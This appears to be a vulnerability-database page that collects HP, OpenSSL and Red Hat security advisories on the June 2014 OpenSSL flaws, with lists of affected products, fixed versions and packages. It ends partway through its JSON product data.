RT-MSR3040-AC-OVS-AS-H3 (0235A20V)
MSR30-16 MSR3016.SI_5.20.R2513P02 JD659A HP MSR30-16 POE Multi-Service Router JD665A HP MSR30-16 Multi-Service Router JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) H3C MSR 30-16 (0235A237) H3C MSR 30-16 POE (0235A238)
MSR30-1X MSR301X.SI_5.20.R2513P09 JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) H3C RT-MSR3011-AC-OVS-H3 (0235A29L)
MSR50 MSR50.SI_5.20.R2513P02 JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR5040-DC-OVS-H3C (0235A20P) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L)
MSR50-G2 MSR50.EPUSI_5.20.R2513P02 JD429A HP MSR50 G2 Processor Module JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q) H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD(0231A0KL)
MSR20 Russian version MSR20.SI_5.20.R2513L03.RU JD663B HP MSR20-21 Router JF228A HP MSR20-40 Router JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324) H3C RT-MSR2040-AC-OVS-H3 (0235A326)
MSR20-1X Russian version MSR201X_5.20.R2513L03.RU JD431A HP MSR20-10 Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)
MSR30 Russian version MSR30.SI_5.20.R2513L03.RU JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)
MSR30-16 Russian version MSR3016.SI_5.20.R2513L03.RU JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)
MSR30-1X Russian version MSR301X.SI_5.20.R2513L03.RU JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L) H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)
MSR50 Russian version MSR50.SI_5.20.R2513L03.RU JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR 50 Processor Module (0231A791) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR5040-DC-OVS-H3C (0235A20P)
MSR50 G2 Russian version MSR50.EPUSI_5.20.R2513L03.RU JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL)
MSR9XX MSR9XX_5.20.R2513P02 JF812A HP MSR900 Router JF813A HP MSR920 Router JF814A HP MSR900-W Router JF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr JG207A HP MSR900-W Router (NA) JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2) H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX) H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4) H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)
MSR93X MSR93X_5.20.R2513P02 JG511A HP MSR930 Router JG512A HP MSR930 Wireless Router JG513A HP MSR930 3G Router JG514A HP MSR931 Router JG515A HP MSR931 3G Router JG516A HP MSR933 Router JG517A HP MSR933 3G Router JG518A HP MSR935 Router JG519A HP MSR935 Wireless Router JG520A HP MSR935 3G Router JG531A HP MSR931 Dual 3G Router JG596A HP MSR930 4G LTE/3G CDMA Router JG597A HP MSR936 Wireless Router JG665A HP MSR930 4G LTE/3G WCDMA Global Router JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
MSR1000 MSR1000_5.20.R2513P02 JG732A HP MSR1003-8 AC Router
MSR1000 Russian version MSR1000_5.20.R2513L03-RU JG732A HP MSR1003-8 AC Router
MSR2000 MSR2000_7.10.R0106P02 JG411A HP MSR2003 AC Router
MSR3000 MSR3000_7.10.R0106P02 JG404A HP MSR3064 Router JG405A HP MSR3044 Router JG406A HP MSR3024 AC Router JG409A HP MSR3012 AC Router JG861A HP MSR3024 TAA-compliant AC Router
MSR4000 MSR4000_7.10.R0106P02 JG402A HP MSR4080 Router Chassis JG403A HP MSR4060 Router Chassis JG412A HP MSR4000 MPU-100 Main Processing Unit
F5000 SECPATH5000FA_5.20.F3210P20 JG216A HP F5000 Firewall Standalone Chassis JD259A HP A5000-A5 VPN Firewall Chassis H3C SecPath F5000-A5 Host System (0150A0AG)
F5000 C F5000C_5.20.R3811 JG650A HP F5000-C VPN Firewall Appliance
F5000 S F5000S_5.20.R3811 JG370A HP F5000-S VPN Firewall Appliance
U200S and CS U200S_U200CS_5.20.F5123P27 JD268A HP 200-CS UTM Appliance JD273A HP U200-S UTM Appliance H3C SecPath U200-S (0235A36N)
U200A and M U200A_U200M_5.20.F5123P27 JD274A HP 200-M UTM Appliance JD275A HP U200-A UTM Appliance H3C SecPath U200-A (0235A36Q)
F1000A and S AF1000S.EI_3.40.R3734 JD270A HP S1000-S VPN Firewall Appliance JD271A HP S1000-A VPN Firewall Appliance JG213A HP F1000-S-EI VPN Firewall Appliance JG214A HP F1000-A-EI VPN Firewall Appliance
SecBlade III SECBLADEIII.FW_5.20.R3820 JG371A HP 12500 20Gbps VPN Firewall Module JG372A HP 10500/11900/7500 20Gbps VPN FW Mod
SecBlade FW SECBLADE2-FW_5.20.R3181 JC635A HP 12500 VPN Firewall Module JD245A HP 9500 VPN Firewall Module JD249A HP 10500/7500 Advanced VPN Firewall Mod JD250A HP 6600 Firewall Processing Rtr Module JD251A HP 8800 Firewall Processing Module JD255A HP 5820 VPN Firewall Module H3C S9500E SecBlade VPN Firewall Module (0231A0AV) H3C S7500E SecBlade VPN Firewall Module (0231A832) H3C SR66 Gigabit Firewall Module (0231A88A) H3C SR88 Firewall Processing Module (0231A88L) H3C S5820 SecBlade VPN Firewall Module (0231A94J)
F1000E SECPATH1000FE_5.20.R3181 JD272A HP S1000-E VPN Firewall Appliance
VSR1000 VSR1000_7.10.R0203 JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software JG811AAE HP VSR1001 Comware 7 Virtual Services Router JG812AAE HP VSR1004 Comware 7 Virtual Services Router JG813AAE HP VSR1008 Comware 7 Virtual Services Router
WX5002/5004 WX5002-WX5004_5.20.R2507P26 JD441A HP 5800 ACM for 64-256 APs JD447B HP WX5002 Access Controller JD448A HP A-WX5004 Access Controller JD448B HP WX5004 Access Controller JD469A HP A-WX5004 (3Com) Access Controller JG261A HP 5800 Access Controller OAA TAA Mod
HP 850/870 850-870_5.20.R2607P26 JG723A HP 870 Unified Wired-WLAN Appliance JG725A HP 870 Unifd Wrd-WLAN TAA Applnc JG722A HP 850 Unified Wired-WLAN Appliance JG724A HP 850 Unifd Wrd-WLAN TAA Applnc
HP 830 830_5.20.R3507P26 JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch JG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch JG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch JG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch
HP 6000 6000_5.20.R2507P27 JG639A HP 10500/7500 20G Unified Wired-WLAN Mod JG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod
M220 Fix in progress use mitigations J9798A HP M220 802.11n AM Access Point J9799A HP M220 802.11n WW Access Point
NGFW The Software Downloads and software release notes for your NGFW Appliance(s) can be acquired with a valid support contract by accessing the Threat Management Center (TMC). In your web browser open https://tmc.tippingpoint.com. JC882A HP S1050F NGFW Aplnc w/DVLabs 1-yr Lic JC883A HP S3010F NGFW Aplnc w/DVLabs 1-yr Lic JC884A HP S3020F NGFW Aplnc w/DVLabs 1-yr Lic JC885A HP S8005F NGFW Aplnc w/DVLabs 1-yr Lic JC886A HP S8010F NGFW Aplnc w/DVLabs 1-yr Lic
iMC UAM 7.x 5.x iMC UAM 7.0 (E0203P04) JD144A HP IMC UAM S/W Module w/200-User License JF388A HP IMC UAM S/W Module w/200-user License JD435A HP IMC EAD Client Software JF388AAE HP IMC UAM S/W Module w/200-user E-LTU JG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU
iMC EAD 7.x 5.x iMC EAD v7.1 (E0301) JF391AAE HP IMC EAD S/W Module w/200-user E-LTU JG754AAE HP IMC EAD SW Module w/ 50-user E-LTU JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License JF391A HP IMC EAD S/W Module w/200-user License
HISTORY Version:1 (rev.1) - 20 June 2014 Initial release Version:2 (rev.2) - 20 November 2014 Removed iMC Platform Products, 5900 virtual switch, and Router 8800 products. Further analysis revealed that those products as not vulnerable. Added additional products.
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux)
iEYEARECAAYFAlRuJqYACgkQ4B86/C0qfVkBZwCg+M/bssV0KI2Nfe2delq1N6KO 2ZUAoKT/5gXpIsdJb4Jyh8GVclzk70rZ =9QSF -----END PGP SIGNATURE----- . OpenSSL Security Advisory [05 Jun 2014] ========================================
SSL/TLS MITM vulnerability (CVE-2014-0224)
An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers. This can be exploited by a Man-in-the-middle (MITM) attack where the attacker can decrypt and modify traffic from the attacked client and server.
The attack can only be performed between a vulnerable client and server. OpenSSL clients are vulnerable in all versions of OpenSSL. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution.
OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h.
Thanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and researching this issue. This issue was reported to OpenSSL on 1st May 2014 via JPCERT/CC.
The fix was developed by Stephen Henson of the OpenSSL core team partly based on an original patch from KIKUCHI Masashi.
DTLS recursion flaw (CVE-2014-0221)
By sending an invalid DTLS handshake to an OpenSSL DTLS client the code can be made to recurse eventually crashing in a DoS attack.
Only applications using OpenSSL as a DTLS client are affected.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.
Thanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This issue was reported to OpenSSL on 9th May 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
DTLS invalid fragment vulnerability (CVE-2014-0195)
A buffer overrun attack can be triggered by sending invalid DTLS fragments to an OpenSSL DTLS client or server. This is potentially exploitable to run arbitrary code on a vulnerable client or server.
Only applications using OpenSSL as a DTLS client or server affected.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.
Thanks to Jüri Aedla for reporting this issue. This issue was reported to OpenSSL on 23rd April 2014 via HP ZDI.
The fix was developed by Stephen Henson of the OpenSSL core team. This flaw only affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
This issue was reported in public. The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)
A race condition in the ssl3_read_bytes function can allow remote attackers to inject data across sessions or cause a denial of service. This flaw only affects multithreaded applications using OpenSSL 1.0.0 and 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
This issue was reported in public.
Anonymous ECDH denial of service (CVE-2014-3470)
OpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a denial of service attack.
OpenSSL 0.9.8 users should upgrade to 0.9.8za OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
Thanks to Felix Gröbert and Ivan Fratrić at Google for discovering this issue. This issue was reported to OpenSSL on 28th May 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
Other issues
OpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for CVE-2014-0076: Fix for the attack described in the paper "Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack" Reported by Yuval Yarom and Naomi Benger. This issue was previously fixed in OpenSSL 1.0.1g.
References
URL for this Security Advisory: http://www.openssl.org/news/secadv_20140605.txt
Note: the online version of the advisory may be updated with additional details over time.
The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Storage Server 2.1 - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. (CVE-2014-0195)
Multiple flaws were found in the way OpenSSL handled read and write buffers when the SSL_MODE_RELEASE_BUFFERS mode was enabled. A specially crafted DTLS handshake packet could cause a DTLS client using OpenSSL to crash. A specially crafted handshake packet could cause a TLS/SSL client that has the anonymous ECDH cipher suite enabled to crash. (CVE-2014-3470)
Red Hat would like to thank the OpenSSL project for reporting these issues. Upstream acknowledges KIKUCHI Masashi of Lepidum as the original reporter of CVE-2014-0224, Jüri Aedla as the original reporter of CVE-2014-0195, Imre Rad of Search-Lab as the original reporter of CVE-2014-0221, and Felix Gröbert and Ivan Fratrić of Google as the original reporters of CVE-2014-3470. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Package List:
Red Hat Storage Server 2.1:
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
x86_64: openssl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-static-1.0.1e-16.el6_5.14.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201405-0244", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "19" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.1" }, { "model": "mariadb", "scope": "lt", "trust": 1.0, "vendor": "mariadb", "version": "10.0.13" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "20" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "mariadb", "scope": "gte", "trust": 1.0, "vendor": "mariadb", "version": "10.0.0" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "12.3" }, { "model": "linux enterprise workstation extension", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "bladecenter advanced management module 3.66e", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "security enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.3" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.8.106" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "policy center v100r003c00spc305", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "solaris", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.1.20.5.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos d30", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "documentum content server p06", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58200" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800" }, { "model": "junos os 13.1r4-s3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "junos 12.1r8-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "ip video phone e20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "ios software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.1x46-d25", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "ios xe software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.5" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate products", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.2" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6.1" }, { "model": "cp1543-1", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "junos 12.1r", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "isoc v200r001c00spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "60000" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.9" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "small business isa500 series integrated security appliances", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "srg1200\u00262200\u00263200 v100r002c02hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.2" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "junos 12.3r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ive os 7.4r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "junos os 11.4r12-s4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v2-480" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "junos 11.4r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": 